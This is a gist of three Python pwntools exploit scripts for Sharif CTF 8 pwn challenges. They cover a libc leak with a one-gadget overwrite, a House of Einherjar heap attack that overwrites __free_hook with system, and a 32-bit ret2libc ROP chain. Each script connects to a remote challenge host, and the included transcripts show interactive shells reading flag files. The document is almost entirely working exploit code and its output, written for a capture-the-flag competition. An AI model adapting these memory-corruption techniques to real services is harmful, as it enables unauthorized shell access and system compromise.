
@0xacb
Last active February 3, 2018 23:26
Sharif CTF 8 - Pwn 75, 125 and 250
from pwn import *
'''
Have you ever played with this *special* seq holder in Python?
nc ctf.sharif.edu 22106
Alternative: nc 213.233.161.38 22106
'''
# Switch between a locally spawned copy of the service and the remote
# instance named in the challenge text; every helper below talks to `r`.
local = False
r = process("./server.py") if local else remote("213.233.161.38", 22106)
def menu():
    """Consume the service output up to and including the "Exit" menu entry.

    The bytes read are discarded; the call only advances the stream so the
    next send lands after the menu has been printed.
    """
    _ = r.recvuntil("Exit")
def create_db(id, tag, l):
    """Drive menu option 1: create an entry with `id`, `tag` and length `l`.

    The four values are sent as separate lines in this fixed order; no
    prompt text is consumed here (callers pair it with menu()).
    """
    for line in ("1", str(id), tag, str(l)):
        r.sendline(line)
def edit_db(tag, seq=None):
    """Drive menu option 2 and send `tag` as the new tag field.

    `seq` is accepted for signature compatibility but never used: after the
    "[2] seq" prompt the function always picks sub-option "1" (tag) and
    sends `tag` verbatim.
    """
    r.sendline("2")
    r.recvuntil("[2] seq")
    for line in ("1", tag):
        r.sendline(line)
def print_db(tag=True):
    """Drive menu option 3 and return the raw text of one field.

    With tag=True sub-option "1" is chosen and the text after "tag: " is
    returned; otherwise sub-option "2" and the text after "seq: ". The read
    stops at the next menu line ("1.") and the last three characters (the
    delimiter and the byte before it) are stripped.
    """
    r.sendline("3")
    r.recvuntil("[2] seq")
    choice, prompt = ("1", "tag: ") if tag else ("2", "seq: ")
    r.sendline(choice)
    r.recvuntil(prompt)
    return r.recvuntil("1.")[:-3]
# Python 2 pwntools script (str and bytes are one type): the str + p64()
# concatenation and str.ljust on recv output below raise TypeError on
# Python 3.
create_db(0, "", 20)
menu()
# Read the "seq" field of the empty entry; whatever comes back is padded to
# 8 bytes and unpacked as a 64-bit integer.
leak_s = print_db(tag=False)
libc_leak = u64(leak_s.ljust(8, "\x00"))
info("libc_leak: %s" % hex(libc_leak))
# NOTE(review): offset is the difference of two addresses observed in one
# debugging session; it is only valid for that exact libc build.
libc_offset = 0x7fa3043f7b88-0x00007fa304033000
libc_base = libc_leak - libc_offset
info("libc_base: %s" % hex(libc_base))
menu()
# NOTE(review): both constants below are specific to the challenge binary
# and libc used at the event and are not derivable from this script.
writable_addr = 0x921010
one_shot_shell = libc_base + 0x4526a
edit_db("A"*8 + p64(0)+ p64(0) + p64(writable_addr) + p64(20) + p64(one_shot_shell) + p64(0)) # overflow and overwrite db method
menu()
r.sendline("5")
r.interactive()
# Transcript of the original run, kept as a bare string literal (it has no
# runtime effect).
'''
[+] Opening connection to 213.233.161.38 on port 22106: Done
[*] libc_leak: 0x7f534050bb88
[*] libc_base: 0x7f5340147000
[*] Switching to interactive mode
Enter selected menu> $ id
uid=1001(suctf) gid=1001(suctf) groups=1001(suctf)
$ cat /home/suctf/flag
SharifCTF{0N3_M0R3_5T3P_70_**J1T**_H34V3N}
'''
from pwn import *
'''
Someone has designed this top secret management service for us. He was insisting on the term `t00p`. Could you please take a look and find out why?
nc ctf.sharif.edu 22107
Alternative: nc 213.233.161.38 22107
'''
# Run against a locally spawned copy of the binary or the remote instance
# from the challenge text; all helpers below speak to `r` only.
local = False
master_key = "wjigaep;r[jg]ahrg[es9hrg"
r = process("./t00p_secrets") if local else remote("213.233.161.38", 22107)
# The service asks for the master key before showing its menu; answer it
# once up front.
r.recvuntil("Enter your master key: ")
r.sendline(master_key)
def menu():
    """Read up to the "> " prompt and return everything consumed."""
    prompt = "> "
    return r.recvuntil(prompt)
def create(idx, size, content, binary=True):
    """Drive menu option 1: store `content` as secret `idx` with body size `size`.

    Each prompt is answered in turn; at the "String(1): " prompt "0" is sent
    when binary=True and "1" otherwise. `content` goes out via send(), i.e.
    without a trailing newline, so the caller controls the exact bytes.
    """
    r.sendline("1")
    answers = (
        ("Enter secret idx: ", str(idx)),
        ("Enter secret body size: ", str(size)),
        ("String(1): ", "0" if binary else "1"),
    )
    for prompt, answer in answers:
        r.recvuntil(prompt)
        r.sendline(answer)
    r.recvuntil("):")
    r.send(content)
def edit(idx, content, binary=True):
    """Drive menu option 3: replace the body of secret `idx` with `content`.

    "0" is sent at the "String(1): " prompt when binary=True, "1" otherwise;
    `content` is written with send() (no trailing newline).
    """
    r.sendline("3")
    answers = (
        ("Please enter secret id to edit: ", str(idx)),
        ("String(1): ", "0" if binary else "1"),
    )
    for prompt, answer in answers:
        r.recvuntil(prompt)
        r.sendline(answer)
    r.recvuntil("content: ")
    r.send(content)
def delete(idx):
    """Drive menu option 2 and delete secret `idx`."""
    option = "2"
    r.sendline(option)
    r.recvuntil("to delete: ")
    r.sendline(str(idx))
def print_secret(idx):
    """Drive menu option 5 and return the printed body of secret `idx`.

    Returns "" when the service replies "No such secret!". Otherwise the
    text between "content: " and the following newline is returned. If the
    marker is missing, find() yields -1 and the slice starts at offset 8 —
    kept as in the original.
    """
    r.sendline("5")
    r.recvuntil("Please enter secret id to print: ")
    r.sendline(str(idx))
    reply = r.recvuntil("1.")[:-3]
    if "No such secret!" in reply:
        return ""
    marker = "content: "
    start = reply.find(marker) + len(marker)
    end = reply.find("\n", start)
    return reply[start:end]
def change_master(master_key):
    """Drive menu option 7 and answer both master-key prompts with `master_key`.

    send() is used (no newline) so the key bytes are passed exactly as given.
    """
    r.sendline("7")
    for _ in range(2):
        r.recvuntil("Enter your master key: ")
        r.send(master_key)
# Python 2 pwntools script (str and bytes are one type): the str + p64() and
# ljust/`in` operations on recv output below raise TypeError on Python 3.
menu()
# leak libc address:
create(0, 128, "A"*4)
menu()
create(1, 128, "B"*4)
menu()
create(2, 128, "C"*4)
menu()
delete(1)
menu()
create(1, 128, "A"*8)
menu()
s = print_secret(1)
# Bytes 8..16 of the printed body are unpacked as a 64-bit integer.
libc_address = u64(s[8:16])
info("libc leak: %s" % hex(libc_address))
# NOTE(review): 0x3c4b78 (and 0x3c67a8 / 0x45390 further down) are offsets
# into one specific libc build; they are not derivable from this script.
libc_offset = 0x3c4b78
libc_base = libc_address-libc_offset
info("libc base: %s" % hex(libc_base))
# clean up
delete(0)
menu()
delete(1)
menu()
delete(2)
menu()
# heap leak
create(0, 16, "A"*4)
menu()
create(1, 16, "B"*4)
menu()
create(2, 16, "C"*4)
menu()
delete(1)
menu()
delete(0)
menu()
create(0, 8, "\x30")
menu()
s = print_secret(0)
# Fewer than 8 bytes may come back; pad with NULs before unpacking.
heap_address = u64(s[0:8].ljust(8, "\x00"))
info("heap leak: %s" % hex(heap_address))
heap_base = heap_address-0x30
info("heap_base: %s" % hex(heap_base))
# clean up
delete(2)
menu()
delete(0)
menu()
# house of einherjar
create(7, 0x100, "e") # size
menu()
create(4, 40, "a"*10)
menu()
create(5, 0xf8, "b"*10)
menu()
edit(4, "a"*40, False) # OBO
menu()
# NOTE(review): hard-coded absolute address specific to the challenge
# binary; not recoverable from this script.
target = 0x602098
evil_prev_size = (heap_base + 0x1b0)-(target)
info("prev_size: %s" % hex(evil_prev_size))
edit(4, "a"*0x20 + p64(evil_prev_size), True)
menu()
new_master = p64(evil_prev_size) + p64(target) + p64(target)
change_master(new_master)
delete(5)
menu()
free_hook = libc_base + 0x3c67a8
system = libc_base + 0x45390
info("free_hook: %s" % hex(free_hook))
info("system: %s" % hex(system))
# write system to free_hook
create(5, 512, "/bin/sh\x00".ljust((8*6), "\x00") + p64(free_hook))
menu()
edit(4, p64(system))
menu()
delete(5)
r.interactive()
# Transcript of the original run, kept as a bare string literal (it has no
# runtime effect).
'''
[+] Opening connection to 213.233.161.38 on port 22107: Done
[*] libc leak: 0x7f7d4e8fcb78
[*] libc base: 0x7f7d4e538000
[*] heap leak: 0x237d030
[*] heap_base: 0x237d000
[*] prev_size: 0x1d7b118
[*] free_hook: 0x7f7d4e8fe7a8
[*] system: 0x7f7d4e57d390
[*] Switching to interactive mode
$ id
uid=1001(suctf) gid=1001(suctf) groups=1001(suctf)
$ cat /home/suctf/flag
SharifCTF{R34V1L1NG_S3CR3T5_VI4_51NGL3_NULL_BY73}
'''
from pwn import *
'''
It all started with a leak bang
nc ctf.sharif.edu 4801
Alternative: nc 213.233.161.38 4801
'''
# Python 2 pwntools script: the "A"*22 + p32(...) concatenations below mix
# str and bytes and raise TypeError on Python 3.
local = False
if local:
    r = process("./vuln4")
else:
    r = remote("213.233.161.38", 4801)
# leak puts address
# NOTE(review): the three addresses below are specific to the challenge
# binary (32-bit, given the p32/u32 use) and are not derivable from this
# script.
puts_got = 0x8049874
puts_plt = 0x80483A0
main = 0x80484EA
r.recvuntil("yourself\n")
payload = "A"*22 + p32(puts_plt) + p32(main) + p32(puts_got) # return to main
r.sendline(payload)
# Everything up to the next "This" is the leaked output (last five
# characters stripped); its first 4 bytes are unpacked as a 32-bit integer.
s = r.recvuntil("This")[:-5]
puts_libc = u32(s[0:4])
info("puts_libc = %s" % hex(puts_libc))
r.recvuntil("yourself\n")
# system("/bin/sh")
# NOTE(review): offsets are differences of addresses observed in some other
# session that is not shown here; they assume the remote libc matches it.
system_offset = 0x565b4ca0-0x5658fda0
bin_sh_offset = 0x566b0a0b-0x565b4ca0
system_libc = puts_libc - system_offset
bin_sh = puts_libc + bin_sh_offset
info("system_libc = %s" % hex(system_libc))
info("bin_sh = %s" % hex(bin_sh))
payload = "A"*22 + p32(system_libc) + p32(main) + p32(bin_sh)
r.sendline(payload)
r.interactive()
# Transcript of the original run, kept as a bare string literal (it has no
# runtime effect).
'''
[*] puts_libc = 0xb75cbca0
[*] system_libc = 0xb75a6da0
[*] bin_sh = 0xb76c7a0b
[*] Switching to interactive mode
$ id
uid=1002(ctfuser) gid=1002(ctfuser) groups=1002(ctfuser)
$ cat /home/ctfuser/flag
SharifCTF{7af9dab81dff481772609b97492d6899}
'''